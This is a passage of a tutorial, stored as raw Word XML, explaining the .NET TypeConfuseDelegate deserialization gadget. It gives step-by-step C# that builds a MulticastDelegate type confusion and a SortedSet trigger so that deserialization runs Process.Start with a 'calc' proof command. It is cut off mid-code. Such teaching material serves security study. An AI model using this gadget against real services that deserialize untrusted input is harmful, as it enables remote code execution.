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F401" w14:textId="4025BEB9" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="322" w:after="322"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The TypeConfuseDelegate Gadget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F750FA" w14:textId="30FB6143" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:after="299"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCFEBF1" w14:textId="4EC0B269" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>For the last two exploits, we have used the ObjectDataProvider gadget, but many more gadgets exist and more are discovered all the time, so let's take a look at another one called the TypeConfuseDelegate gadget.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DB8124" w14:textId="7C216212" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:after="299"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>What is TypeConfuseDelegate?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B2974A" w14:textId="7FEBD27F" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">TypeConfuseDelegate is the name of a .NET Framework deserialization gadget originally disclosed by </w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r w:rsidRPr="3CBF7C4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>James Forshaw</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidRPr="3CBF7C4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>this Google Project Zero blog post</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E47BFA" w14:textId="78A99AB9" w:rsidR="00F43A27" w:rsidRDefault="00AB76BF" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EBEF734" wp14:editId="51CBB946">
            <wp:extent cx="5724524" cy="4514850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="264871140" name="Picture 2648711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4514850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6508FF25" w14:textId="3A72603E" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The code is relatively short, but it probably doesn't make a lot of sense the first time you see it, so let's figure out what's going on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494EE20E" w14:textId="659B3D50" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:after="299"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How does it work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D8F64A" w14:textId="4A943E0A" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The first thing we need to understand is that this gadget begins with a class called ComparisonComparer, which is a serializable, internal class in the Comparer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1228F152" w14:textId="2D6FD736" w:rsidR="00F43A27" w:rsidRDefault="00AB76BF" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="083F817D" wp14:editId="080A144F">
            <wp:extent cx="5133976" cy="2724150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="102299264" name="Picture 1022992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33976" cy="2724150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43582220" w14:textId="7FA3845F" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">ComparisonComprarer extends the Comparer class, and has an internal </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidRPr="3CBF7C4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>Comparison&lt;T&gt;</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> property. Comparison&lt;T&gt; is a special type of variable called a Delegate, which means it refers to another method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672964DC" w14:textId="38A20009" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74235F03" w14:textId="29334662" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>public delegate int Comparison&lt;in T&gt;(T x, T y);</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9EDF8C" w14:textId="7AAE06B5" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Most importantly, inside the Compare method we see that this delegated method is invoked. So if we can create a ComparisonComparer and somehow delegate Process.Start as the comparison method, then when Compare is called Process.Start will be invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3823F829" w14:textId="7BDBE1C0" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Although ComparisonComparer is an internal class inside Comparer, which means it can not be instantiated by other classes than Comparer, it is exposed via the Comparer.Create method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CF6226" w14:textId="2EF4FFE8" w:rsidR="00F43A27" w:rsidRDefault="00AB76BF" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="355EE438" wp14:editId="388B4245">
            <wp:extent cx="5495924" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1143696284" name="Picture 11436962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95924" cy="1905000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8CB878" w14:textId="52C0084E" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>So we have a way to create a ComparisonComparer, but our problem now is that Comparison expects a method that returns an int, and Process.Start returns a Process object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3FC04F" w14:textId="085858E7" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This is where MulticastDelegate comes into play. To put it simply, a MulticastDelegate is just a list of delegated methods that are to be invoked one after another. Although we still can not delegate Process.Start as a Comparison&lt;T&gt; due to the return type, we can exploit a long-standing .NET Framework issue where type signatures are not always enforced, and overwrite an already delegated function in a MulticastDelegate instance with a method which returns a different type, in this case Process.Start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AC3BFE" w14:textId="5F413679" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>So let's take a look at the beginning of the gadget code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A33CF88" w14:textId="2916E105" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB9D5A2" w14:textId="7F2C2ED4" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>// We delegate `string.Compare` as a new `Comparison&lt;T&gt;`</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Delegate stringCompare = new Comparison&lt;string&gt;(string.Compare);</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>// We create a `MulticastDelegate` by chaining two `string.Compare` methods in a row</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Comparison&lt;string&gt; multicastDelegate = (Comparison&lt;string&gt;) MulticastDelegate.Combine(stringCompare, stringCompare);</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>// We create a `ComparisonComparer` instance using `Comparer.Create` and pass the `MulticastDelegate` that we created as the `Comparison&lt;T&gt;` parameter to the constructor</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>IComparer&lt;string&gt; comparisonComparer = Comparer&lt;string&gt;.Create(multicastDelegate);</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC08F2E" w14:textId="58EEA20A" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>At this point, we have a ComparisonComparer instance which will invoke two string.Compare methods in a row when the Compare method is invoked. This is where the "Type Confusion" comes in. Inside MulticastDelegate is a private field called _invocationList which contains the delegated methods in the order they should be invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43826E49" w14:textId="406CDC8C" w:rsidR="00F43A27" w:rsidRDefault="00AB76BF" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48896921" wp14:editId="0AFCCB2F">
            <wp:extent cx="5724524" cy="2533650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="135579361" name="Picture 1355793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2533650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C526BF5" w14:textId="61E39138" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Since this is a private field, we can not update it directly, however, we can get around this by using a class called FieldInfo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B682F8" w14:textId="68727417" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6E0ECC" w14:textId="3B71A911" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>// Get the `FieldInfo` for `_invocationList`, specifying it is a `Non-Public`, `Instance` variable</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>// Get the `invocation list` from our `MulticastDelegate`</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>object[] invoke_list = multicastDelegate.GetInvocationList();</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>// Overwrite the second delegated function (`string.Compare`) with `Process.Start`</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>invoke_list[1] = new Func&lt;string, string, Process&gt;(Process.Start);</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>fi.SetValue(multicastDelegate, invoke_list);</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF93AA9" w14:textId="5747A700" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Now we have a MulticastDelegate which invokes string.Compare followed by Process.Start whenever the ComparisonComparer invokes Compare. But we don't have anything that invokes Compare yet. This is where SortedSet comes in. SortedSet is a Set that automatically sorts itself each time a new item is added (assuming there are at least two items in total). To do the sorting, it invokes Compare on the instance's internal Comparer which can be specified by the user, meaning we can supply our ComparisonComparer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2F9676" w14:textId="23F0BC54" w:rsidR="00F43A27" w:rsidRDefault="00AB76BF" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DA6D400" wp14:editId="13E72DDD">
            <wp:extent cx="5724524" cy="4162425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1451092110" name="Picture 14510921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4162425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BEA9AB" w14:textId="4DC5D59F" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Additionally, and equally important, SortedSet can be serialized and upon deserialization it will add the items to a new SortedSet instance one by one, effectively triggering the Compare function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7E8D7D" w14:textId="64900A5C" w:rsidR="00F43A27" w:rsidRDefault="00AB76BF" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2050E8A9" wp14:editId="5E61329F">
            <wp:extent cx="5724524" cy="3686175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1433387826" name="Picture 14333878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686175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1039B3" w14:textId="453DB9C6" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>So the last few lines of the gadget are the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04676543" w14:textId="2E156AC2" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39013E37" w14:textId="27C60D7F" w:rsidR="00F43A27" w:rsidRDefault="3CBF7C4D" w:rsidP="3CBF7C4D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>// Create a SortedSet with our ComparisonComparer and add two strings</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>//   which will act as the FileName and Arguments parameters when passed</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>//   to Process.Start(string FileName, string Arguments)</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>SortedSet&lt;string&gt; sortedSet = new SortedSet&lt;string&gt;(comparisonComparer);</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>sortedSet.Add("/c calc");</w:t>
      </w:r>
      <w:r w:rsidR="00AB76BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3CBF7C4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
